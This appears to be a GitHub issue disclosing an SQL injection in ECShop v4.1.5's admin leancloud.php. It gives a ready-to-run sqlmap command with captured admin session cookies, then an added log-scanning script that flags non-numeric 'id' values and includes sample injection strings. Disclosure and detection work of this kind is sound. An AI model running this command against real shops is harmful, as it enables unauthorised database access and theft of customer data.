EcShop v4.1.5 SQL injection vulnerability #1

Open
xhcccan opened this issue Sep 24, 2023 · 0 comments
xhcccan commented Sep 24, 2023

  1. First log in to the backend, then visit the page below and use Burp to capture the packet and obtain the corresponding cookie.

/ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123

Note: The cookie must contain the following key-value pairs. If one item is missing, it means that the correct packet was not captured or it must be reconfigured.

  2. Use sqlmap for injection testing, taking care to replace the number in --cookie with the actual cookie, and finally obtain the data successfully.

```
sqlmap -u "http://172.16.214.182/ECShop_V4.1.5/source/ecshop/admin/leancloud.php?id=123" --data "act=resend" -p "id" --skip "act,cookie,user-agent,referer,host" --risk 3 --level 5 --dbms mysql --cookie "loginNum=1; ECS_LastCheckOrder=Thu%2C%2028%20Apr%202022%2013%3A16%3A49%20GMT; PHPSESSID=ebtmgof8q3bto0ai088fsvl4bh; ECS_ID=18d636b4644873c4fdb46cf3c4c2b135a912706e; ECS[visit_times]=1; ECSCP_ID=378bf619d7c9c9df588c937be89e20acd56e0821; Hm_lvt_154183a478f900f0163b2141ac4416a5=1651151808; Hm_lpvt_154183a478f900f0163b2141ac4416a5=1651151808" --dbs --flush-session --batch --random-agent
```
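For defenders triaging this report, the following is an added detection example, not part of the original issue or of ECShop's code. It scans web-server access logs for requests to `admin/leancloud.php` whose `id` query parameter is not a plain decimal integer. It keys on the parameter rather than the User-Agent because the command above runs with `--random-agent`. The Combined Log Format, the assumption that legitimate `id` values are numeric, the function name and the sample lines are all assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: client ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
ENDPOINT = "/admin/leancloud.php"   # path suffix taken from the report
NUMERIC = re.compile(r"[0-9]+")     # assumption: legitimate ids are decimal integers


def suspicious_requests(lines):
    """Return (client, decoded_id) for leancloud.php hits with a non-numeric id."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                # not an access-log line we understand
        client, _method, target, _status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(ENDPOINT):
            continue
        # parse_qs percent-decodes, so encoded values are checked in clear form.
        # The id travels in the URL even for POST requests, so it is always logged.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not NUMERIC.fullmatch(value):
                hits.append((client, value))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '10.0.0.5 - - [24/Sep/2023:10:00:01 +0000] "GET /ECShop_V4.1.5/source/ecshop/'
    'admin/leancloud.php?id=123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [24/Sep/2023:10:00:07 +0000] "POST /ECShop_V4.1.5/source/ecshop/'
    'admin/leancloud.php?id=123%27 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [24/Sep/2023:10:00:08 +0000] "POST /ECShop_V4.1.5/source/ecshop/'
    'admin/leancloud.php?id=123%20AND%201%3D1 HTTP/1.1" 200 498 "-" "Opera/9.80"',
    '10.0.0.7 - - [24/Sep/2023:10:00:09 +0000] "GET /ECShop_V4.1.5/source/ecshop/'
    'index.php?id=abc HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE):
        print(f"{client} sent non-numeric id to {ENDPOINT}: {value!r}")
```
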